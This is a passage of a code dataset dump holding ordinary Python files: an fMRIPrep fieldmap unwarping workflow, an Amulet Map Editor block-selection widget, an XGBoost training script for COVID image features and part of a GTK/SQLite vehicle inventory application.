name='fmap_fov2ref_apply')\n\n apply_fov_mask = pe.Node(fsl.ApplyMask(), name=\"apply_fov_mask\")\n\n ref_msk_post = pe.Node(ComputeEPIMask(generate_report=True, dilation=1),\n name='ref_msk_post')\n\n workflow.connect([\n (inputnode, meta, [('name_source', 'in_file')]),\n (inputnode, explicit_mask_epi, [('in_reference', 'in_file'),\n ('in_mask', 'mask_file')]),\n (inputnode, fmap2ref_reg, [('fmap_ref', 'moving_image')]),\n (inputnode, fmap2ref_apply, [('in_reference', 'reference_image')]),\n (fmap2ref_reg, fmap2ref_apply, [\n ('composite_transform', 'transforms')]),\n (inputnode, fmap_mask2ref_apply, [('in_reference', 'reference_image')]),\n (fmap2ref_reg, fmap_mask2ref_apply, [\n ('composite_transform', 'transforms')]),\n (inputnode, ds_reg_vsm, [('name_source', 'source_file')]),\n (fmap2ref_apply, ds_reg_vsm, [('out_report', 'in_file')]),\n (explicit_mask_epi, fmap2ref_reg, [('out_file', 'fixed_image')]),\n (inputnode, ds_reg, [('name_source', 'source_file')]),\n (fmap2ref_reg, ds_reg, [('out_report', 'in_file')]),\n (inputnode, fmap2ref_apply, [('fmap', 'input_image')]),\n (inputnode, fmap_mask2ref_apply, [('fmap_mask', 'input_image')]),\n (fmap2ref_apply, torads, [('output_image', 'in_file')]),\n (meta, gen_vsm, [(('out_dict', _get_ec), 'dwell_time'),\n (('out_dict', _get_pedir_fugue), 'unwarp_direction')]),\n (meta, vsm2dfm, [(('out_dict', _get_pedir_bids), 'pe_dir')]),\n (torads, gen_vsm, [('out', 'fmap_in_file')]),\n (vsm2dfm, unwarp_reference, [('out_file', 'transforms')]),\n (inputnode, unwarp_reference, [('in_reference', 'reference_image')]),\n (inputnode, unwarp_reference, [('in_reference', 'input_image')]),\n (vsm2dfm, outputnode, [('out_file', 'out_warp')]),\n (vsm2dfm, jac_dfm, [('out_file', 'deformationField')]),\n (inputnode, fieldmap_fov_mask, [('fmap_ref', 'in_file')]),\n (fieldmap_fov_mask, fmap_fov2ref_apply, [('out', 'input_image')]),\n (inputnode, fmap_fov2ref_apply, [('in_reference', 'reference_image')]),\n (fmap2ref_reg, fmap_fov2ref_apply, [('composite_transform', 'transforms')]),\n (fmap_fov2ref_apply, apply_fov_mask, [('output_image', 'mask_file')]),\n (unwarp_reference, apply_fov_mask, [('output_image', 'in_file')]),\n (apply_fov_mask, ref_msk_post, [('out_file', 'in_file')]),\n (apply_fov_mask, outputnode, [('out_file', 'out_reference')]),\n (ref_msk_post, outputnode, [('mask_file', 'out_mask')]),\n (ref_msk_post, outputnode, [('out_report', 'out_mask_report')]),\n (jac_dfm, outputnode, [('jacobian_image', 'out_jacobian')]),\n ])\n\n if not settings.get('fmap_bspline', False):\n workflow.connect([\n (fmap_mask2ref_apply, gen_vsm, [('output_image', 'mask_file')])\n ])\n\n if settings.get('fmap-demean', True):\n # Demean within mask\n demean = pe.Node(niu.Function(function=_demean), name='demean')\n\n workflow.connect([\n (gen_vsm, demean, [('shift_out_file', 'in_file')]),\n (fmap_mask2ref_apply, demean, [('output_image', 'in_mask')]),\n (demean, vsm2dfm, [('out', 'in_file')]),\n ])\n\n else:\n workflow.connect([\n (gen_vsm, vsm2dfm, [('shift_out_file', 'in_file')]),\n ])\n\n return workflow\n\n# Helper functions\n# ------------------------------------------------------------\n\n\ndef _get_ec(in_dict):\n return float(in_dict['EffectiveEchoSpacing'])\n\n\ndef _get_pedir_bids(in_dict):\n return in_dict['PhaseEncodingDirection']\n\n\ndef _get_pedir_fugue(in_dict):\n return in_dict['PhaseEncodingDirection'].replace('i', 'x').replace('j', 'y').replace('k', 'z')\n\n\ndef _hz2rads(in_file, out_file=None):\n \"\"\"Transform a fieldmap in Hz into rad/s\"\"\"\n from math import pi\n import nibabel as nb\n from fmriprep.utils.misc import genfname\n if out_file is None:\n out_file = genfname(in_file, 'rads')\n nii = nb.load(in_file)\n data = nii.get_data() * 2.0 * pi\n nb.Nifti1Image(data, nii.get_affine(),\n nii.get_header()).to_filename(out_file)\n return out_file\n\n\ndef _demean(in_file, in_mask, out_file=None):\n import numpy as np\n import nibabel as nb\n from fmriprep.utils.misc import genfname\n\n if out_file is None:\n out_file = genfname(in_file, 'demeaned')\n nii = nb.load(in_file)\n msk = nb.load(in_mask).get_data()\n data = nii.get_data()\n data -= np.median(data[msk > 0])\n nb.Nifti1Image(data, nii.affine, nii.header).to_filename(\n out_file)\n return out_file\n\n\ndef _fill_with_ones(in_file):\n import nibabel as nb\n import numpy as np\n import os\n\n nii = nb.load(in_file)\n data = np.ones(nii.shape)\n\n out_name = os.path.abspath(\"out.nii.gz\")\n nb.Nifti1Image(data, nii.affine, nii.header).to_filename(out_name)\n\n return out_name\n", "sub_path": "fmriprep/workflows/fieldmap/unwarp.py", "file_name": "unwarp.py", "file_ext": "py", "file_size_in_byte": 10789, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "nipype.pipeline.engine.Workflow", "line_number": 86, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 86, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 87, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 87, "usage_type": "name"}, {"api_name": "nipype.interfaces.utility.IdentityInterface", "line_number": 87, "usage_type": "call"}, {"api_name": "nipype.interfaces.utility", "line_number": 87, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 90, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 90, "usage_type": "name"}, {"api_name": "nipype.interfaces.utility.IdentityInterface", "line_number": 90, "usage_type": "call"}, {"api_name": "nipype.interfaces.utility", "line_number": 90, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 94, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 94, "usage_type": "name"}, {"api_name": "fmriprep.interfaces.ReadSidecarJSON", "line_number": 94, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 96, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 96, "usage_type": "name"}, {"api_name": "nipype.interfaces.fsl.ApplyMask", "line_number": 96, "usage_type": "call"}, {"api_name": "nipype.interfaces.fsl", "line_number": 96, "usage_type": "name"}, {"api_name": "pkg_resources.resource_filename", "line_number": 100, "usage_type": "call"}, {"api_name": "pkg_resources.resource_filename", "line_number": 102, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 104, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 104, "usage_type": "name"}, {"api_name": "niworkflows.interfaces.registration.ANTSRegistrationRPT", "line_number": 104, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 110, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 110, "usage_type": "name"}, {"api_name": "fmriprep.interfaces.bids.DerivativesDataSink", "line_number": 111, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 115, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 115, "usage_type": "name"}, {"api_name": "niworkflows.interfaces.registration.ANTSApplyTransformsRPT", "line_number": 115, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 119, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 119, "usage_type": "name"}, {"api_name": "niworkflows.interfaces.registration.ANTSApplyTransformsRPT", "line_number": 119, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 124, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 124, "usage_type": "name"}, {"api_name": "fmriprep.interfaces.bids.DerivativesDataSink", "line_number": 125, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 129, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 129, "usage_type": "name"}, {"api_name": "nipype.interfaces.utility.Function", "line_number": 129, "usage_type": "call"}, {"api_name": "nipype.interfaces.utility", "line_number": 129, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 131, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 131, "usage_type": "name"}, {"api_name": "nipype.interfaces.fsl.FUGUE", "line_number": 131, "usage_type": "call"}, {"api_name": "nipype.interfaces.fsl", "line_number": 131, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 134, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 134, "usage_type": "name"}, {"api_name": "fmriprep.interfaces.itk.FUGUEvsm2ANTSwarp", "line_number": 134, "usage_type": "call"}, {"api_name": "fmriprep.interfaces.itk", "line_number": 134, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 135, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 135, "usage_type": "name"}, {"api_name": "nipype.interfaces.ants.CreateJacobianDeterminantImage", "line_number": 135, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 138, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 138, "usage_type": "name"}, {"api_name": "niworkflows.interfaces.registration.ANTSApplyTransformsRPT", "line_number": 138, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 144, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 144, "usage_type": "name"}, {"api_name": "nipype.interfaces.utility.Function", "line_number": 144, "usage_type": "call"}, {"api_name": "nipype.interfaces.utility", "line_number": 144, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 146, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 146, "usage_type": "name"}, {"api_name": "niworkflows.interfaces.registration.ANTSApplyTransformsRPT", "line_number": 146, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 151, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 151, "usage_type": "name"}, {"api_name": "nipype.interfaces.fsl.ApplyMask", "line_number": 151, "usage_type": "call"}, {"api_name": "nipype.interfaces.fsl", "line_number": 151, "usage_type": "name"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 153, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 153, "usage_type": "name"}, {"api_name": "niworkflows.interfaces.masks.ComputeEPIMask", "line_number": 153, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine.Node", "line_number": 204, "usage_type": "call"}, {"api_name": "nipype.pipeline.engine", "line_number": 204, "usage_type": "name"}, {"api_name": "nipype.interfaces.utility.Function", "line_number": 204, "usage_type": "call"}, {"api_name": "nipype.interfaces.utility", "line_number": 204, "usage_type": "name"}, {"api_name": "fmriprep.utils.misc.genfname", "line_number": 241, "usage_type": "call"}, {"api_name": "nibabel.load", "line_number": 242, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 243, "usage_type": "name"}, {"api_name": "nibabel.Nifti1Image", "line_number": 244, "usage_type": "call"}, {"api_name": "fmriprep.utils.misc.genfname", "line_number": 255, "usage_type": "call"}, {"api_name": "nibabel.load", "line_number": 256, "usage_type": "call"}, {"api_name": "nibabel.load", "line_number": 257, "usage_type": "call"}, {"api_name": "numpy.median", "line_number": 259, "usage_type": "call"}, {"api_name": "nibabel.Nifti1Image", "line_number": 260, "usage_type": "call"}, {"api_name": "nibabel.load", "line_number": 270, "usage_type": "call"}, {"api_name": "numpy.ones", "line_number": 271, "usage_type": "call"}, {"api_name": "os.path.abspath", "line_number": 273, "usage_type": "call"}, {"api_name": "os.path", "line_number": 273, "usage_type": "attribute"}, {"api_name": "nibabel.Nifti1Image", "line_number": 274, "usage_type": "call"}]} {"seq_id": "350756960", "text": "import wx\nfrom wx.lib import newevent\nfrom typing import Tuple, List, Optional\n\nimport PyMCTranslate\n\nfrom amulet_map_editor.api.image import COLOUR_PICKER\n\n(\n NamespaceChangeEvent,\n EVT_NAMESPACE_CHANGE,\n) = newevent.NewCommandEvent() # the namespace entry changed\n(\n BlockNameChangeEvent,\n EVT_BLOCK_NAME_CHANGE,\n) = newevent.NewCommandEvent() # the block name entry changed\n(\n BlockChangeEvent,\n EVT_BLOCK_CHANGE,\n) = (\n newevent.NewCommandEvent()\n) # the block or namespace changed. Generated after EVT_BLOCK_NAME_CHANGE\n(\n PickBlockEvent,\n EVT_PICK_BLOCK,\n) = newevent.NewCommandEvent() # The pick block button was pressed\n\n\nclass BlockSelect(wx.Panel):\n def __init__(\n self,\n parent: wx.Window,\n translation_manager: PyMCTranslate.TranslationManager,\n platform: str,\n version_number: Tuple[int, int, int],\n force_blockstate: bool,\n namespace: str = None,\n block_name: str = None,\n show_pick_block: bool = False,\n ):\n super().__init__(parent, style=wx.BORDER_SIMPLE)\n self._sizer = wx.BoxSizer(wx.VERTICAL)\n self.SetSizer(self._sizer)\n\n self._translation_manager = translation_manager\n\n self._platform: Optional[str] = None\n self._version_number: Optional[Tuple[int, int, int]] = None\n self._force_blockstate: Optional[bool] = None\n\n sizer = wx.BoxSizer(wx.HORIZONTAL)\n self._sizer.Add(sizer, 0, wx.EXPAND | wx.ALL, 5)\n text = wx.StaticText(self, label=\"Namespace:\", style=wx.ALIGN_CENTER)\n sizer.Add(text, 1, wx.ALIGN_CENTER_VERTICAL)\n self._namespace_combo = wx.ComboBox(self)\n sizer.Add(self._namespace_combo, 2)\n self._set_version((platform, version_number, force_blockstate or False))\n self._populate_namespace()\n self.set_namespace(namespace)\n\n self._namespace_combo.Bind(\n wx.EVT_TEXT, lambda evt: self._post_namespace_change()\n )\n self._do_text_event = (\n True # some widgets create events. This is used to suppress them\n )\n\n self.Bind(EVT_NAMESPACE_CHANGE, self._on_namespace_change)\n sizer = wx.BoxSizer(wx.VERTICAL)\n self._sizer.Add(sizer, 1, wx.EXPAND | wx.LEFT | wx.RIGHT | wx.BOTTOM, 5)\n header_sizer = wx.BoxSizer(wx.HORIZONTAL)\n sizer.Add(header_sizer, 0, wx.EXPAND | wx.BOTTOM, 5)\n header_sizer.Add(\n wx.StaticText(self, label=\"Block name:\", style=wx.ALIGN_CENTER),\n 1,\n wx.ALIGN_CENTER_VERTICAL,\n )\n search_sizer = wx.BoxSizer(wx.HORIZONTAL)\n header_sizer.Add(search_sizer, 2, wx.EXPAND)\n self._block_search = wx.SearchCtrl(self)\n search_sizer.Add(self._block_search, 1, wx.ALIGN_CENTER_VERTICAL)\n self._block_search.Bind(wx.EVT_TEXT, self._on_search_change)\n if show_pick_block:\n pick_block_button = wx.BitmapButton(\n self, bitmap=COLOUR_PICKER.bitmap(22, 22)\n )\n search_sizer.Add(\n pick_block_button, 0, wx.LEFT | wx.ALIGN_CENTER_VERTICAL, 5\n )\n pick_block_button.Bind(\n wx.EVT_BUTTON,\n lambda evt: wx.PostEvent(\n self, PickBlockEvent(self.GetId(), widget=self)\n ),\n )\n self._block_list_box = wx.ListBox(self, style=wx.LB_SINGLE)\n sizer.Add(self._block_list_box, 1, wx.EXPAND)\n\n self._block_names: List[str] = []\n self._populate_block_name()\n self.set_block_name(block_name)\n self._block_list_box.Bind(wx.EVT_LISTBOX, lambda evt: self._post_block_change())\n\n def _post_namespace_change(self):\n if self._do_text_event:\n wx.PostEvent(\n self, NamespaceChangeEvent(self.GetId(), namespace=self.namespace)\n )\n self._do_text_event = True\n\n def _post_block_change(self):\n wx.PostEvent(\n self, BlockNameChangeEvent(self.GetId(), block_name=self.block_name)\n ),\n wx.PostEvent(\n self,\n BlockChangeEvent(\n self.GetId(), namespace=self.namespace, block_name=self.block_name\n ),\n )\n\n @property\n def version(self) -> Tuple[str, Tuple[int, int, int], bool]:\n return self._platform, self._version_number, self._force_blockstate\n\n @version.setter\n def version(self, version: Tuple[str, Tuple[int, int, int], bool]):\n self._set_version(version)\n self._populate_namespace()\n self.namespace = None\n\n def _set_version(self, version: Tuple[str, Tuple[int, int, int], bool]):\n assert (\n version[0] in self._translation_manager.platforms()\n and version[1] in self._translation_manager.version_numbers(version[0])\n and isinstance(version[2], bool)\n ), f\"{version} is not a valid version\"\n self._platform, self._version_number, self._force_blockstate = version\n\n @property\n def namespace(self) -> str:\n return self._namespace_combo.GetValue()\n\n @namespace.setter\n def namespace(self, namespace: str):\n self.set_namespace(namespace)\n wx.PostEvent(self, NamespaceChangeEvent(self.GetId(), namespace=self.namespace))\n\n def set_namespace(self, namespace: str):\n namespace = namespace or \"minecraft\"\n if isinstance(namespace, str):\n if namespace in self._namespace_combo.GetItems():\n self._namespace_combo.SetSelection(\n self._namespace_combo.GetItems().index(namespace)\n )\n else:\n self._namespace_combo.ChangeValue(namespace)\n\n @property\n def block_name(self) -> str:\n block_name: str = self._block_list_box.GetString(\n self._block_list_box.GetSelection()\n )\n if self._block_list_box.GetSelection() == 0 and block_name.startswith('\"'):\n block_name = block_name[1:-1]\n return block_name\n\n @block_name.setter\n def block_name(self, block_name: str):\n if self.set_block_name(block_name):\n self._post_block_change()\n\n def set_block_name(self, block_name: str) -> bool:\n block_name = block_name or \"\"\n self._block_search.ChangeValue(block_name)\n return self._update_block_name(block_name)\n\n def _populate_namespace(self):\n version = self._translation_manager.get_version(\n self._platform, self._version_number\n )\n namespaces = version.block.namespaces(self._force_blockstate)\n self._do_text_event = False\n self._namespace_combo.Set(namespaces)\n\n def _populate_block_name(self):\n version = self._translation_manager.get_version(\n self._platform, self._version_number\n )\n self._block_names = version.block.base_names(\n self.namespace, self._force_blockstate\n )\n self._block_list_box.SetItems(self._block_names)\n\n def _on_namespace_change(self, evt):\n self._populate_block_name()\n self.block_name = None\n evt.Skip()\n\n def _on_search_change(self, evt):\n search_str = evt.GetString()\n if self._update_block_name(search_str):\n self._post_block_change()\n\n def _update_block_name(self, search_str: str) -> bool:\n block_names = [bn for bn in self._block_names if search_str in bn]\n if search_str not in block_names:\n block_names.insert(0, f'\"{search_str}\"')\n\n index = 0\n selection = self._block_list_box.GetSelection()\n if selection != wx.NOT_FOUND:\n current_string = self._block_list_box.GetString(selection)\n if current_string in block_names:\n index = block_names.index(current_string)\n\n self._block_list_box.SetItems(block_names)\n if index:\n # if the previously selected string is in the list select that\n self._block_list_box.SetSelection(index)\n return False\n elif search_str in block_names:\n # if the searched text perfectly matches select that\n self._block_list_box.SetSelection(block_names.index(search_str))\n return True\n elif len(self._block_list_box.GetItems()) >= 2:\n self._block_list_box.SetSelection(1)\n return True\n else:\n self._block_list_box.SetSelection(0)\n return True\n\n\nif __name__ == \"__main__\":\n\n def main():\n app = wx.App()\n translation_manager = PyMCTranslate.new_translation_manager()\n dialog = wx.Dialog(None)\n sizer = wx.BoxSizer()\n dialog.SetSizer(sizer)\n sizer.Add(BlockSelect(dialog, translation_manager, \"java\", (1, 16, 0), False))\n dialog.Show()\n dialog.Fit()\n app.MainLoop()\n\n main()\n", "sub_path": "amulet_map_editor/api/wx/ui/block_select/block.py", "file_name": "block.py", "file_ext": "py", "file_size_in_byte": 8828, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "wx.lib.newevent.NewCommandEvent", "line_number": 12, "usage_type": "call"}, {"api_name": "wx.lib.newevent", "line_number": 12, "usage_type": "name"}, {"api_name": "wx.lib.newevent.NewCommandEvent", "line_number": 16, "usage_type": "call"}, {"api_name": "wx.lib.newevent", "line_number": 16, "usage_type": "name"}, {"api_name": "wx.lib.newevent.NewCommandEvent", "line_number": 21, "usage_type": "call"}, {"api_name": "wx.lib.newevent", "line_number": 21, "usage_type": "name"}, {"api_name": "wx.lib.newevent.NewCommandEvent", "line_number": 26, "usage_type": "call"}, {"api_name": "wx.lib.newevent", "line_number": 26, "usage_type": "name"}, {"api_name": "wx.Panel", "line_number": 29, "usage_type": "attribute"}, {"api_name": "wx.Window", "line_number": 32, "usage_type": "attribute"}, {"api_name": "PyMCTranslate.TranslationManager", "line_number": 33, "usage_type": "attribute"}, {"api_name": "typing.Tuple", "line_number": 35, "usage_type": "name"}, {"api_name": "wx.BORDER_SIMPLE", "line_number": 41, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 42, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 42, "usage_type": "attribute"}, {"api_name": "typing.Optional", "line_number": 47, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 48, "usage_type": "name"}, {"api_name": "typing.Optional", "line_number": 49, "usage_type": "name"}, {"api_name": "wx.BoxSizer", "line_number": 51, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 51, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.ALL", "line_number": 52, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 53, "usage_type": "call"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 53, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 54, "usage_type": "attribute"}, {"api_name": "wx.ComboBox", "line_number": 55, "usage_type": "call"}, {"api_name": "wx.EVT_TEXT", "line_number": 62, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 69, "usage_type": "call"}, {"api_name": "wx.VERTICAL", "line_number": 69, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.LEFT", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.RIGHT", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 70, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 71, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 71, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 72, "usage_type": "attribute"}, {"api_name": "wx.BOTTOM", "line_number": 72, "usage_type": "attribute"}, {"api_name": "wx.StaticText", "line_number": 74, "usage_type": "call"}, {"api_name": "wx.ALIGN_CENTER", "line_number": 74, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 76, "usage_type": "attribute"}, {"api_name": "wx.BoxSizer", "line_number": 78, "usage_type": "call"}, {"api_name": "wx.HORIZONTAL", "line_number": 78, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 79, "usage_type": "attribute"}, {"api_name": "wx.SearchCtrl", "line_number": 80, "usage_type": "call"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 81, "usage_type": "attribute"}, {"api_name": "wx.EVT_TEXT", "line_number": 82, "usage_type": "attribute"}, {"api_name": "wx.BitmapButton", "line_number": 84, "usage_type": "call"}, {"api_name": "amulet_map_editor.api.image.COLOUR_PICKER.bitmap", "line_number": 85, "usage_type": "call"}, {"api_name": "amulet_map_editor.api.image.COLOUR_PICKER", "line_number": 85, "usage_type": "name"}, {"api_name": "wx.LEFT", "line_number": 88, "usage_type": "attribute"}, {"api_name": "wx.ALIGN_CENTER_VERTICAL", "line_number": 88, "usage_type": "attribute"}, {"api_name": "wx.EVT_BUTTON", "line_number": 91, "usage_type": "attribute"}, {"api_name": "wx.PostEvent", "line_number": 92, "usage_type": "call"}, {"api_name": "wx.ListBox", "line_number": 96, "usage_type": "call"}, {"api_name": "wx.LB_SINGLE", "line_number": 96, "usage_type": "attribute"}, {"api_name": "wx.EXPAND", "line_number": 97, "usage_type": "attribute"}, {"api_name": "typing.List", "line_number": 99, "usage_type": "name"}, {"api_name": "wx.EVT_LISTBOX", "line_number": 102, "usage_type": "attribute"}, {"api_name": "wx.PostEvent", "line_number": 106, "usage_type": "call"}, {"api_name": "wx.PostEvent", "line_number": 112, "usage_type": "call"}, {"api_name": "wx.PostEvent", "line_number": 115, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 123, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 127, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 132, "usage_type": "name"}, {"api_name": "wx.PostEvent", "line_number": 147, "usage_type": "call"}, {"api_name": "wx.NOT_FOUND", "line_number": 212, "usage_type": "attribute"}, {"api_name": "wx.App", "line_number": 237, "usage_type": "call"}, {"api_name": "PyMCTranslate.new_translation_manager", "line_number": 238, "usage_type": "call"}, {"api_name": "wx.Dialog", "line_number": 239, "usage_type": "call"}, {"api_name": "wx.BoxSizer", "line_number": 240, "usage_type": "call"}]} {"seq_id": "136178587", "text": "__author__ = '@Tssp'\nimport numpy as np\nimport pandas as pd\nimport os\nimport matplotlib.pyplot as plt\nimport xgboost as xgb\nfrom codvidutils.Autoencoder_Uncertainty_Transformation_main import Transformation_main\nimport pickle\n\nfor it in range(0, 10):\n model = 'hdf_files/Uncertainty_AE_Covid.hdf5'\n outputs = Transformation_main('data/train_split_v4.csv', 'data/test_split_v5.csv', model)\n Y_test = outputs['Y_test']\n Y_train = outputs['Y_train']\n encoder_train = outputs['encoder_train']\n encoder_test = outputs['encoder_test']\n del outputs\n\n #------------XGBoost------------#\n # Regressor:\n lr = 0.005\n n_trees = 250\n depth = 3\n print('#'*10 +' max depth = {} '.format(depth)+ '#'*10)\n xgbr = xgb.XGBRegressor(objective ='reg:logistic', learning_rate = lr, n_estimators = n_trees, max_depth=depth, n_jobs=-1)\n xgbr.fit(encoder_train, Y_train)\n # save model\n pickle.dump(xgbr, open('log/XGBr_uncmodel_{}.pkl'.format(it+1), \"wb\"))\n encoder_test = encoder_test.reshape((encoder_test.shape[0], 23*23*70))\n preds = xgbr.predict(encoder_test)\n nocovid = preds[np.where(Y_test == 0)]\n covid = preds[np.where(Y_test == 1)]\n print(\"\\n\\n---------- Predictions ----------\\n\")\n print(\"preds = \", preds)\n np.savetxt('log/preds_XGBr_Uncertainty_{}.txt'.format(it+1), preds, delimiter=',')\n del encoder_train, encoder_test, xgbr, preds, nocovid, covid, Y_test, Y_train\n", "sub_path": "Uncertainty_XGBoost.py", "file_name": "Uncertainty_XGBoost.py", "file_ext": "py", "file_size_in_byte": 1431, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "codvidutils.Autoencoder_Uncertainty_Transformation_main.Transformation_main", "line_number": 12, "usage_type": "call"}, {"api_name": "xgboost.XGBRegressor", "line_number": 25, "usage_type": "call"}, {"api_name": "pickle.dump", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.where", "line_number": 32, "usage_type": "call"}, {"api_name": "numpy.savetxt", "line_number": 35, "usage_type": "call"}]} {"seq_id": "338540099", "text": "# -*- coding: utf-8 -*-\n'''\nCreated on 12/11/2012\n\n@author: victor\n'''\n\nimport sqlite3\nimport gtk\nimport pygtk\nimport Informacion\nfrom Pedidos import Pedidos\n\ndef lt( cadena ):\n return unicode( cadena, 'utf-8' ).encode( 'iso-8859-1' )\n\nclass Vehiculos( object ):\n\n sql = \"select * from vistaVehiculos where estado = 'Ninguno'\"\n\n def __init__( self, widgets ):\n self.widgets = widgets\n self.ventanaVehiculos = self.widgets.get_object( \"windowVehiculos\" )\n self.listaCombus = self.widgets.get_object( \"listCombustible\" )\n self.listaTipos = self.widgets.get_object( \"listTipo\" )\n\n self.entryMatric = self.widgets.get_object( \"entryMat\" )\n self.entryMarca = self.widgets.get_object( \"entryMar\" )\n self.entryModelo = self.widgets.get_object( \"entryMod\" )\n self.entryKM = self.widgets.get_object( \"spinKM\" )\n self.entryYear = self.widgets.get_object( \"spinYear\" )\n self.entryColor = self.widgets.get_object( \"entryCol\" )\n self.comboCombus = self.widgets.get_object( \"comboCombus\" )\n self.comboTipo = self.widgets.get_object( \"comboTipo\" )\n self.precioActual = self.widgets.get_object( \"entryPrecioActual\" )\n self.ajuste = self.widgets.get_object( \"adjustment1\" )\n\n self.listaVehiculos = self.widgets.get_object( \"listVehiculos\" )\n self.listaVehiculos.clear()\n self.tvVehiculos = self.widgets.get_object( \"treeviewVehiculos\" )\n\n self.checkDispo = self.widgets.get_object( \"checkDispo\" )\n self.checkVend = self.widgets.get_object( \"checkVend\" )\n self.checkElim = self.widgets.get_object( \"checkElim\" )\n\n self.imgMatric = self.widgets.get_object( \"imageMatric\" )\n self.bInsertar = self.widgets.get_object( \"buttonAccionVeh\" )\n\n # Marco dos por defecto\n self.checkDispo.set_active( 1 )\n self.checkVend.set_active( 1 )\n self.checkElim.set_active( 0 )\n\n self.listar( None )\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n\n with conn:\n self.listaCombus.clear()\n self.listaTipos.clear()\n c = conn.cursor()\n sql = \"select * from combustibles\"\n c.execute( sql )\n for datos in c:\n self.listaCombus.append( [datos[0]] )\n\n sql = \"select * from tipo\"\n c.execute( sql )\n for datos in c:\n self.listaTipos.append( [datos[0]] )\n\n def listar( self, widget ):\n \"Muestra todos los vehiculos\"\n conn = sqlite3.connect( 'datos.db' )\n conn.text_factory = str\n\n with conn:\n c = conn.cursor()\n self.sql = \"select * from vistaVehiculos where estado = 'Ninguno'\"\n\n if ( self.checkDispo.get_active() ):\n self.sql += \" or estado = 'Disponible'\"\n\n if ( self.checkElim.get_active() ):\n self.sql += \" or estado = 'Eliminado'\"\n\n if ( self.checkVend.get_active() ):\n self.sql += \" or estado = 'Vendido'\"\n\n c.execute( self.sql )\n self.listaVehiculos.clear()\n\n for datos in c:\n if ( datos[7] == 'Disponible' ):\n color = '#90D78A'\n elif ( datos[7] == 'Vendido' ):\n color = '#D7D48A'\n else:\n color = '#FFA8A8'\n\n self.listaVehiculos.append( [datos[0], datos[1], datos[2], int( datos[3] ), datos[4], datos[5], 